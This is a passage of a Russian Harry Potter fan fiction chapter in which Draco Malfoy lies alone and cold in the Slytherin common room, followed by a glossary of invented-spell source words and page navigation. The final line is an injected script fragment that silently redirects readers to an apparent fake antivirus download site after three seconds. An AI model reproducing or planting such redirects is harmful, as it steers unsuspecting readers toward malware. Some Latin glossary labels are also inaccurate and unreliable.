Если бы Грег и Винс были с ним, он бы рассмешил их по дороге в гостиную, а там устроился бы на своем любимом диване возле камина, положив голову Пэнси на колени. Они бы смеялись и жалели его, пока он жаловался бы на гриффиндорцев и грязнокровок, и постепенно их разговоры убаюкали бы Драко.

Проход в их гостиную неожиданно громко закрылся позади него. Юный Малфой вздрогнул и пробудился от мечтаний. Огонь в камине погас и комната остыла, но вместо того чтобы разжечь его снова, Драко присел на диван, повернувшись лицом к озеру. Диванная подушка казалась достаточно удобной. Юноша плотнее завернулся в мантию и лег. Едва заметный лунный свет проникал сквозь замерзшую поверхность озера. Он тихонько гладил лицо Драко, пока тот ждал прихода сна, очередного кошмара и нового дня.

risana (староангл.) – расти
aetus (староангл.) – греть
heorte (староангл.) – сердце
crepara (лат.) – трескаться
hemoragia (лат.) - кровоизлияние

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>